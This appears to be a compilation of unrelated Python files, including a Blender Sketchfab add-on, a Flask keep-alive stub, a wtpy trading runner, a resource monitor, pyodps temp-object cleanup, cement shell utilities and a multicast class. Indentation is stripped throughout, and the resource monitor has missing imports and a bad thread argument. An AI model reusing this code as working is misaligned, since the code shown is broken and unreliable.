# Rely on Blender temporary directory
if bpy.app.version == (2, 79, 0):
if bpy.context.user_preferences.filepaths.temporary_directory:
return bpy.context.user_preferences.filepaths.temporary_directory
else:
return tempfile.mkdtemp()
else:
if bpy.context.preferences.filepaths.temporary_directory:
return bpy.context.preferences.filepaths.temporary_directory
else:
return tempfile.mkdtemp()
def updateCacheDirectory(self, context):
# Get the cache path from the preferences, or a default temporary
path = os.path.abspath(get_temporary_path())
# Delete the old directory
# Won't delete anything upon plugin intialization, only when switching path in preferences
if Config.SKETCHFAB_TEMP_DIR and os.path.exists(Config.SKETCHFAB_TEMP_DIR) and os.path.isdir(Config.SKETCHFAB_TEMP_DIR):
shutil.rmtree(Config.SKETCHFAB_TEMP_DIR)
# Create the paths and directories for temporary directories
Config.SKETCHFAB_TEMP_DIR = os.path.join(path, "sketchfab_downloads")
Config.SKETCHFAB_THUMB_DIR = os.path.join(Config.SKETCHFAB_TEMP_DIR, 'thumbnails')
Config.SKETCHFAB_MODEL_DIR = os.path.join(Config.SKETCHFAB_TEMP_DIR, 'imports')
if not os.path.exists(Config.SKETCHFAB_TEMP_DIR): os.makedirs(Config.SKETCHFAB_TEMP_DIR)
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR): os.makedirs(Config.SKETCHFAB_THUMB_DIR)
if not os.path.exists(Config.SKETCHFAB_MODEL_DIR): os.makedirs(Config.SKETCHFAB_MODEL_DIR)
class SketchfabAddonPreferences(bpy.types.AddonPreferences):
bl_idname = __name__
cachePath: StringProperty(
name="Cache folder",
description=(
"Temporary directory for downloads from sketchfab.com\n"
"Set by the OS by default, make sure to have write access\n"
"to this directory if you set it manually"
),
subtype='DIR_PATH',
update=updateCacheDirectory
)
downloadHistory : StringProperty(
name="Download history file",
description=(
".csv file containing your downloads from sketchfab.com\n"
"If valid, the name, license and url of every model you\n"
"download through the plugin will be saved in this file"
),
subtype='FILE_PATH'
)
def draw(self, context):
layout = self.layout
layout.prop(self, "cachePath", text="Download directory")
layout.prop(self, "downloadHistory", text="Download history (.csv)")
classes = (
SketchfabAddonPreferences,
# Properties
SketchfabBrowserProps,
SketchfabLoginProps,
SketchfabBrowserPropsProxy,
SketchfabExportProps,
# Panels
LoginPanel,
TeamsPanel,
SketchfabBrowse,
SketchfabExportPanel,
SketchfabPanel,
# Operators
SketchfabEnable,
SketchfabCreateAccount,
LoginModal,
SketchfabNewVersion,
SketchfabHelp,
SketchfabReportIssue,
SketchfabSearch,
SketchfabSearchPreviousResults,
SketchfabSearchNextResults,
ImportModalOperator,
ViewOnSketchfab,
SketchfabDownloadModel,
SketchfabLogger,
ExportSketchfab,
)
def check_plugin_version(request, *args, **kwargs):
response = request.json()
skfb = get_sketchfab_props()
if response and len(response):
latest_release_version = response[0]['tag_name'].replace('.', '')
current_version = str(bl_info['version']).replace(',', '').replace('(', '').replace(')', '').replace(' ', '')
if latest_release_version == current_version:
print('You are using the latest version({})'.format(response[0]['tag_name']))
skfb.is_latest_version = 1
else:
print('A new version is available: {}'.format(response[0]['tag_name']))
skfb.is_latest_version = 0
else:
print('Failed to retrieve plugin version')
skfb.is_latest_version = -2
def register():
sketchfab_icon = bpy.utils.previews.new()
icons_dir = os.path.join(os.path.dirname(__file__), "resources")
sketchfab_icon.load("skfb", os.path.join(icons_dir, "logo.png"), 'IMAGE')
sketchfab_icon.load("0", os.path.join(icons_dir, "placeholder.png"), 'IMAGE')
res = []
res.append(('NORESULTS', 'empty', "", sketchfab_icon['0'].icon_id, 0))
preview_collection['default'] = tuple(res)
preview_collection['skfb'] = sketchfab_icon
bpy.types.WindowManager.result_previews = EnumProperty(items=list_current_results)
for cls in classes:
bpy.utils.register_class(cls)
bpy.types.WindowManager.sketchfab_browser = PointerProperty(
type=SketchfabBrowserProps)
bpy.types.WindowManager.sketchfab_browser_proxy = PointerProperty(
type=SketchfabBrowserPropsProxy)
bpy.types.WindowManager.sketchfab_api = PointerProperty(
type=SketchfabLoginProps,
)
bpy.types.WindowManager.sketchfab_export = PointerProperty(
type=SketchfabExportProps,
)
# If a cache path was set in preferences, use it
updateCacheDirectory(None, context=bpy.context)
def unregister():
for cls in classes:
bpy.utils.unregister_class(cls)
del bpy.types.WindowManager.sketchfab_api
del bpy.types.WindowManager.sketchfab_browser
del bpy.types.WindowManager.sketchfab_browser_proxy
del bpy.types.WindowManager.sketchfab_export
bpy.utils.previews.remove(preview_collection['skfb'])
del bpy.types.WindowManager.result_previews
Utils.clean_thumbnail_directory()
if __name__ == "__main__":
register()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Subscribe TSO in next 3 seconds or U get booted offline"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
run.py
|
from wtpy import BaseExtParser, BaseExtExecuter
from wtpy import WTSTickStruct
from ctypes import byref
import threading
import time
from wtpy import WtEngine,EngineType
from Strategies.DualThrust import StraDualThrust
class MyExecuter(BaseExtExecuter):
def __init__(self, id: str, scale: float):
super().__init__(id, scale)
def init(self):
print("inited")
def set_position(self, stdCode: str, targetPos: float):
print("position confirmed: %s -> %f " % (stdCode, targetPos))
class MyParser(BaseExtParser):
def __init__(self, id: str):
super().__init__(id)
self.__worker__ = None
def init(self, engine:WtEngine):
'''
初始化
'''
super().init(engine)
def random_sim(self):
while True:
curTick = WTSTickStruct()
curTick.code = bytes("IF2106", encoding="UTF8")
curTick.exchg = bytes("CFFEX", encoding="UTF8")
self.__engine__.push_quote_from_extended_parser(self.__id__, byref(curTick), True)
time.sleep(1)
def connect(self):
'''
开始连接
'''
print("connect")
if self.__worker__ is None:
self.__worker__ = threading.Thread(target=self.random_sim, daemon=True)
self.__worker__.start()
return
def disconnect(self):
'''
断开连接
'''
print("disconnect")
return
def release(self):
'''
释放,一般是进程退出时调用
'''
print("release")
return
def subscribe(self, fullCode:str):
'''
订阅实时行情\n
@fullCode 合约代码,格式如CFFEX.IF2106
'''
# print("subscribe: " + fullCode)
return
def unsubscribe(self, fullCode:str):
'''
退订实时行情\n
@fullCode 合约代码,格式如CFFEX.IF2106
'''
# print("unsubscribe: " + fullCode)
return
if __name__ == "__main__":
#创建一个运行环境,并加入策略
engine = WtEngine(EngineType.ET_CTA)
engine.init('./common/', "config.json")
straInfo = StraDualThrust(name='pydt_au', code="SHFE.au.HOT", barCnt=50, period="m5", days=30, k1=0.2, k2=0.2, isForStk=False)
engine.add_cta_strategy(straInfo)
myParser = MyParser("test")
myExecuter = MyExecuter('exec', 1)
engine.commitConfig()
engine.add_exetended_parser(myParser)
engine.add_exetended_executer(myExecuter)
engine.run()
kw = input('press any key to exit\n')
|
sensor_scheduler.py
|
#! /usr/bin/python
# encoding: utf-8
import re
import os
import sys
import platform
import psutil
import subprocess
def lin_process():
process = psutil.Process(os.getpid())
# Displays the physical memory usage of the system
print "\n ########## PHYSICAL MEMORY USAGE ##########"
print "\n Memory Currently Used: "+str(process.memory_full_info().rss)
print "\n Percentage Memory Used: "+str(process.memory_percent())
# Displays the system disk utlization. USED vs. AVAILABLE
print "\n ########## DISK UTILIZATION for RESIDING FILE SYSTEM ##########"
bash_command_u = "df -h|grep /dev/disk1|awk '{print $3}' " # Change the hdd location here. So instead of /dev/sda1|awk - it should reflect your mount address
print "\n Used Disk Space: "+str(subprocess.check_output(['bash', '-c', bash_command_u]))
bash_command_a = "df -h|grep /dev/disk1|awk '{print $4}' " # Change the hdd location here. So instead of /dev/sda1|awk - it should reflect your mount address
print " Available Disk Space: "+str(subprocess.check_output(['bash', '-c', bash_command_a]))
# Displays the virtual memory usage
print " ########## VIRTUAL MEMORY USAGE ##########"
print "\n Virtual Memory Used: "+str(psutil.virtual_memory().used)
print "\n Virtual Memory Available: "+str(psutil.virtual_memory().available)
print "\n ########## SWAP MEMORY USAGE ##########"
# Displays the swap memory usage
print "\n Swap Memory Used: "+str(psutil.swap_memory().used)
print "\n Swap Memory Available: "+str(psutil.swap_memory().free)
'''
# This chunk of code that is commented out checks for the CPU temperature.
# It has a few pre-requisites that need to be in place before it can run successfully.
print "\n ########## CPU TEMPATURE CHECK ##########"
print psutil.sensors_temperatures()
if subprocess.check_output("sensors") ==1:
print "No sensors found or available!"
else:
temperatures = {match[0]: float(match[1]) for match in re.findall("^(.*?)\:s+\+?(.*?)°C", sensors, re.MULTILINE)}
disk = "/dev/sda"
output = subprocess.check_output(["smartctl", "-A", disk])
temperatures[disk] = int(re.search("Temperature.*\s(\d+)\s*(?:\([\d\s]*\)|)$", output, re.MULTILINE).group(1))
print "\nTemperature:"+str(temperatures[disk])
print "\nSensors temperature:"+str(psutil.sensors_temperatures())
'''
sleep(10)
def main():
# Operating system and platform validation
if platform.system()=="Linux" or platform.system()=="Darwin":
# Thread executes the number of times given in the argument list
t1 = threading.Thread(target = lin_process,args = (5,))
t1.start()
t1.join()
elif platform.system()=="Windows":
win_process()
if __name__=="__main__":
main()
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .accounts import AliyunAccount
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
try:
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
outf.close()
except OSError:
return
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# we do not clean running process, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
if hasattr(odps.account, 'access_id'):
keys = [odps.account.access_id, odps.endpoint, str(odps.project)]
elif hasattr(odps.account, 'token'):
keys = [utils.to_str(odps.account.token), odps.endpoint, str(odps.project)]
return hashlib.md5(utils.to_binary('####'.join(keys))).hexdigest()
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
|
testRecorder.py
|
import unittest
from src.fileIO import fileInputOutput
from src.recorder import recorder
from src.trackable import trackable
from threading import Thread
import time
class testRecorder(unittest.TestCase):
def testAllRecorder(self):
testReader = fileInputOutput("logs/testLogs/testProcesses.txt","logs/testLogs/testTrackedData.txt")
testRecorder = recorder(testReader)
testList = []
testTrackable1 = trackable("testString", 0.0)
testList.append(testTrackable1)
testTrackable2 = trackable("python",0.0)
testList.append(testTrackable2)
for x in testList:
x.setForTrack()
t = Thread(target = testRecorder.turnOnRecording, name = "testthread1",args=(testList,))
t.start()
time.sleep(0.05)
self.assertEqual(testRecorder.isOn(), True)
testRecorder.turnOffRecording()
self.assertEqual(testTrackable1.getIsTracked(), False)
self.assertEqual(testTrackable2.getIsTracked(),True)
self.assertEqual(testRecorder.isOn(), False)
suite = unittest.TestLoader().loadTestsFromTestCase(testRecorder)
unittest.TextTestRunner(verbosity=2).run(suite)
|
main.py
|
from GetAPI import GetAPI
import threading
import time
stop_threads : bool = False
"""
Fonction allowing to refresh data all the 60 seconds on a thread
"""
def getapi_thread() -> None:
myapi : GetAPI = GetAPI()
myapi.login()
while(1):
print("\033[1;34m[INFO]\033[0m Update DATA")
myapi.run()
time.sleep(60)
global stop_threads
if stop_threads:
break
"""
Code allowing to start thread and reset cookies one time by days
"""
while(1):
print("\033[1;34m[INFO]\033[0m Start application !")
x : threading.Thread = threading.Thread(target=getapi_thread,args=())
x.start()
time.sleep(86400)
stop_threads : bool = True
x.join()
print("\033[1;34m[INFO]\033[0m Reset of cookies")
stop_threads : bool = False
|
shell.py
|
"""Common Shell Utilities."""
import os
import sys
from subprocess import Popen, PIPE
from multiprocessing import Process
from threading import Thread
from ..core.meta import MetaMixin
from ..core.exc import FrameworkError
def exec_cmd(cmd_args, *args, **kw):
"""
Execute a shell call using Subprocess. All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The (stdout, stderror, return_code) of the command.
:rtype: tuple
Usage:
.. code-block:: python
from cement.utils import shell
stdout, stderr, exitcode = shell.exec_cmd(['echo', 'helloworld'])
"""
if 'stdout' not in kw.keys():
kw['stdout'] = PIPE
if 'stderr' not in kw.keys():
kw['stderr'] = PIPE
proc = Popen(cmd_args, *args, **kw)
(stdout, stderr) = proc.communicate()
proc.wait()
return (stdout, stderr, proc.returncode)
def exec_cmd2(cmd_args, *args, **kw):
"""
Similar to exec_cmd, however does not capture stdout, stderr (therefore
allowing it to print to console). All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The integer return code of the command.
:rtype: int
Usage:
.. code-block:: python
from cement.utils import shell
exitcode = shell.exec_cmd2(['echo', 'helloworld'])
"""
proc = Popen(cmd_args, *args, **kw)
proc.wait()
return proc.returncode
def spawn_process(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around multiprocessing.Process(). By default the start()
function will be called before the spawned process object is returned.
See `MultiProcessing
<https://docs.python.org/2/library/multiprocessing.html>`_ for more
information on the features of `Process()`.
:param target: The target function to execute in the sub-process.
:param start: Call start() on the process before returning the process
object.
:param join: Call join() on the process before returning the process
object. Only called if start=True.
:param args: Additional arguments are passed to Process().
:param kwargs: Additional keyword arguments are passed to Process().
:returns: The process object returned by Process().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
p = shell.spawn_process(add, args=(12, 27))
p.join()
"""
proc = Process(target=target, *args, **kwargs)
if start and not join:
proc.start()
elif start and join:
proc.start()
proc.join()
return proc
def spawn_thread(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around threading.Thread(). By default the start()
function will be called before the spawned thread object is returned
See `Threading
<https://docs.python.org/2/library/threading.html>`_ for more
information on the features of `Thread()`.
:param target: The target function to execute in the thread.
:param start: Call start() on the thread before returning the thread
object.
:param join: Call join() on the thread before returning the thread
object. Only called if start=True.
:param args: Additional arguments are passed to Thread().
:param kwargs: Additional keyword arguments are passed to Thread().
:returns: The thread object returned by Thread().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
t = shell.spawn_thread(add, args=(12, 27))
t.join()
"""
thr = Thread(target=target, *args, **kwargs)
if start and not join:
thr.start()
elif start and join:
thr.start()
thr.join()
return thr
class Prompt(MetaMixin):
"""
A wrapper around `raw_input` or `input` (py3) whose purpose is to limit
the redundent tasks of gather usr input. Can be used in several ways
depending on the use case (simple input, options, and numbered
selection).
:param text: The text displayed at the input prompt.
Usage:
Simple prompt to halt operations and wait for user to hit enter:
.. code-block:: python
p = shell.Prompt("Press Enter To Continue", default='ENTER')
.. code-block:: text
$ python myapp.py
Press Enter To Continue
$
Provide a numbered list for longer selections:
.. code-block:: python
p = Prompt("Where do you live?",
options=[
'San Antonio, TX',
'Austin, TX',
'Dallas, TX',
'Houston, TX',
],
numbered = True,
)
.. code-block:: text
Where do you live?
1: San Antonio, TX
2: Austin, TX
3: Dallas, TX
4: Houston, TX
Enter the number for your selection:
Create a more complex prompt, and process the input from the user:
.. code-block:: python
class MyPrompt(Prompt):
class Meta:
text = "Do you agree to the terms?"
options = ['Yes', 'no', 'maybe-so']
options_separator = '|'
default = 'no'
clear = True
max_attempts = 99
def process_input(self):
if self.input.lower() == 'yes':
# do something crazy
pass
else:
# don't do anything... maybe exit?
print("User doesn't agree! I'm outa here")
sys.exit(1)
MyPrompt()
.. code-block:: text
$ python myapp.py
[TERMINAL CLEAR]
Do you agree to the terms? [Yes|no|maybe-so] no
User doesn't agree! I'm outa here
$ echo $?
$ 1
"""
class Meta:
"""
Optional meta-data (can also be passed as keyword arguments to the
parent class).
"""
# The text that is displayed to prompt the user
text = "Tell me someting interesting:"
#: A default value to use if the user doesn't provide any input
default = None
#: Options to provide to the user. If set, the input must match one
#: of the items in the options selection.
options = None
#: Separator to use within the option selection (non-numbered)
options_separator = ','
#: Display options in a numbered list, where the user can enter a
#: number. Useful for long selections.
numbered = False
#: The text to display along with the numbered selection for user
#: input.
selection_text = "Enter the number for your selection:"
#: Whether or not to automatically prompt() the user once the class
#: is instantiated.
auto = True
#: Whether to treat user input as case insensitive (only used to
#: compare user input with available options).
case_insensitive = True
#: Whether or not to clear the terminal when prompting the user.
clear = False
#: Command to issue when clearing the terminal.
clear_command = 'clear'
#: Max attempts to get proper input from the user before giving up.
max_attempts = 10
#: Raise an exception when max_attempts is hit? If not, Prompt
#: passes the input through as `None`.
max_attempts_exception = True
def __init__(self, text=None, *args, **kw):
if text is not None:
kw['text'] = text
super(Prompt, self).__init__(*args, **kw)
self.input = None
if self._meta.auto:
self.prompt()
def _prompt(self):
if self._meta.clear:
os.system(self._meta.clear_command)
text = ""
if self._meta.options is not None:
if self._meta.numbered is True:
text = text + self._meta.text + "\n\n"
count = 1
for option in self._meta.options:
text = text + "%s: %s\n" % (count, option)
count += 1
text = text + "\n"
text = text + self._meta.selection_text
else:
sep = self._meta.options_separator
text = "%s [%s]" % (self._meta.text,
sep.join(self._meta.options))
else:
text = self._meta.text
if sys.version_info[0] < 3: # pragma: nocover # noqa
self.input = raw_input("%s " % text) # pragma: nocover # noqa
else: # pragma: nocover # noqa
self.input = input("%s " % text) # pragma: nocover # noqa
if self.input == '' and self._meta.default is not None:
self.input = self._meta.default
elif self.input == '':
self.input = None
def prompt(self):
"""
Prompt the user, and store their input as `self.input`.
"""
attempt = 0
while self.input is None:
if attempt >= int(self._meta.max_attempts):
if self._meta.max_attempts_exception is True:
raise FrameworkError("Maximum attempts exceeded getting "
"valid user input")
else:
return self.input
attempt += 1
self._prompt()
if self.input is None:
continue
elif self._meta.options is not None:
if self._meta.numbered:
try:
self.input = self._meta.options[int(self.input) - 1]
except (IndexError, ValueError) as e:
self.input = None
continue
else:
if self._meta.case_insensitive is True:
lower_options = [x.lower()
for x in self._meta.options]
if not self.input.lower() in lower_options:
self.input = None
continue
else:
if self.input not in self._meta.options:
self.input = None
continue
self.process_input()
return self.input
def process_input(self):
"""
Does not do anything. Is intended to be used in a sub-class to handle
user input after it is prompted.
"""
pass
|
reliable_multicast.py
|
import socket
import struct
import threading
import time
import select
from src.core.utils.configuration import Configuration
from src.core.signatures.signatures import Signatures
from src.core.group_view.group_view import GroupView
from src.core.utils.channel import Channel
from src.protocol.multicast.piggyback import PiggybackMessage
from src.protocol.multicast.heartbeat import HeartBeat
from src.protocol.multicast.nack import NegativeAcknowledgement
from src.protocol.base import Message
class ReliableMulticast:
def __init__(
self,
multicast_addr: str,
multicast_port: int,
identifier: str,
channel: Channel,
group_view: GroupView,
configuration: Configuration,
open: bool = False,
):
self._S_p = 0 # local sender sequence number
self._R_g: dict[str, int] = {identifier: -1} # delivered sequence numbers
self._max_R_g: dict[str, int] = {} # max delivered sequence number registered by heartbeat
self._holdback_queue: dict[str, dict[int, str]] = {identifier: {}}
self._storage: dict[str, list[str]] = {}
self._requested_messages: dict[str, tuple[int, int]] = {}
self._holdback_queue_lock = threading.Lock()
self._R_g_lock = threading.Semaphore()
self._response_channel = Channel()
self._multicast_addr = multicast_addr
self._multicast_port = multicast_port
self._identifier = identifier
self._channel = channel
self._group_view = group_view
self._configuration = configuration
self._open = open
if self._group_view is not None:
self._signature = Signatures(group_view.sk, self._group_view.identifier)
self._setup_multicast_listener()
self._setup_udp_sock()
self._storage = {identifier: []}
self._timeoffset = time.time_ns() / 10**9
self._last_msg_sent_ts = 0
self._suspend_multicast = False
self._contraint_multicast = False
self.terminate = False
self.listening_thread = None
